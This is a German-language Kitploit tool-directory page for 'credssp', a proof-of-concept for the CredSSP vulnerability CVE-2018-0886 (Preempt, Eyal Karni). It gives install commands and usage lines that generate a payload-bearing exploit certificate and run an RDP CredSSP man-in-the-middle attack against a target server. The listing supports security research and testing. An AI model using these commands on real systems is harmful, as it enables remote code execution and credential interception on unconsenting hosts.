Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
credssp — Ein Code, der CVE-2018-0886 demonstriert. | Kitploit
Tools/GitHubGitHub/preempt/credssp
SchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsLernen & BildungRed Teaming
GitHubpreempt/credssp

credssp

Ein Code, der CVE-2018-0886 demonstriert.

Repository anzeigen
26757vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

credssp

Dies ist ein PoC-Code zur Ausnutzung von CVE-2018-0886. Er sollte nur zu Bildungszwecken verwendet werden. Er basiert auf einem Fork des rdpy-Projekts (https://github.com/preempt/rdpy), der auch CredSSP-Relay ermöglicht.

Geschrieben von Eyal Karni, Preempt [email protected]

Erstellung

Anleitung (Linux)

Wenn Sie Ubuntu 14 verwenden, lesen Sie die Installationsdatei. Es wurde auf Ubuntu 16.04 getestet.

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • Es wird von einem ziemlich sauberen Ausgangszustand ausgegangen. Am besten deinstallieren Sie zuerst relevante Komponenten wie cryptography, pyopenssl eventuell (pip uninstall cryptography).
  • Für einen erfolgreichen Betrieb muss eine andere Version von OpenSSL installiert sein. Das Installationsskript erledigt das.
  • Bitte befolgen Sie die Anweisungen in der beschriebenen Reihenfolge.

Ausführen des Exploits

Exportieren Sie ein für die Serverauthentifizierung geeignetes Zertifikat aus einer beliebigen Domäne. (Es wird für RDP verwendet: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

Um ein Zertifikat zu generieren, das die Schwachstelle ausnutzt (die Nutzlast enthält), verwenden Sie:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem BEFEHL

(ExportedCert ist das im ersten Schritt exportierte Zertifikat. exploitc.pem und exploitk.pem sind das generierte Zertifikat bzw. der private Schlüssel.)

Um das Angriffsskript auszuführen:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem ZielServer

Weitere Details finden Sie im Nutzungsbereich der Skripte (--help).

Tool herunterladen